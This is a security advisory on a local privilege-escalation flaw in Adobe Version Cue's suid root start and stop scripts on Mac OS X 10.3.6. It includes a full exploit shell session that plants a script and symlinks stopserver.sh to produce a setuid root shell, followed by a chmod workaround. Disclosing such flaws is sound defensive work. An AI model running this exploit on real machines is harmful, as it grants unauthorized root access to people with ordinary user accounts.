|
|
| |
| A vulnerability in Mac OS X when its bundled with Adobe Version Cue allows a local attacker to create a suid root shell with a non-privileged user. Adobe Version Cue is installed by default with virtually every recent Adobe product. This most likely affects many versions of Mac OS X and Adobe Version Cue. |
| |
Credit:
The information has been provided by fintler.
|
| |
Vulnerable Systems:
* Mac OS X version 10.3.6 with Adobe products
Scripts that start and stop Adobe Version Cue are suid root and do not make any checks to see if they are running from the correct path. By setting the current path to a controlled directory and creating scripts with specific names, a user can have a custom script run euid root.
Exploit:
haven:~ fintler$ cd ~
haven:~ fintler$ id
uid=502(fintler) gid=500(fintler) groups=500(fintler)
haven:~ fintler$ echo "cp /bin/sh /Users/$USER;chmod 4755
/Users/$USER/sh;chown root /Users/$USER/sh" > productname.sh
haven:~ fintler$ chmod 0755 ./productname.sh
haven:~ fintler$ ln -s /Applications/Adobe\ Version\ Cue/stopserver.sh .
haven:~ fintler$ ./stopserver.sh
Stopping ...
./stopserver.sh: line 21: ./tomcat/bin/shutdown.sh: No such file or directory
No matching processes belonging to you were found
haven:~ fintler$ ./sh
sh-2.05b# id
uid=502(fintler) euid=0(root) gid=500(fintler) groups=500(fintler)
sh-2.05b# whoami
root
sh-2.05b#
Workaround:
The following may disable aspects of Adobe Version Cue but should temporarily fix the issue until a more permanent solution is released from Adobe:
'sudo chmod 0755 /Applications/Adobe\ Version\ Cue/stopserver.sh'
'sudo chmod 0755 /Applications/Adobe\ Version\ Cue/startserver.sh'
|
|
|
|
|
|
|
|
